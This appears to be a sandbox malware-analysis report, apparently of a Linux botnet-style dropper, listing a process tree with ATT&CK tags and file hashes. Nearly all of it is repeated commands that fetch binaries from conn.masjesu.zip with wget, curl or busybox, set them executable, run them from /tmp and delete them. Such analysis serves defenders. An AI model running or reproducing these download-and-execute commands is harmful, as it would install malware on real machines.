/usr/bin/wgetwget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:973
-
-
/bin/chmodchmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵PID:994
-
-
/bin/chmodchmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97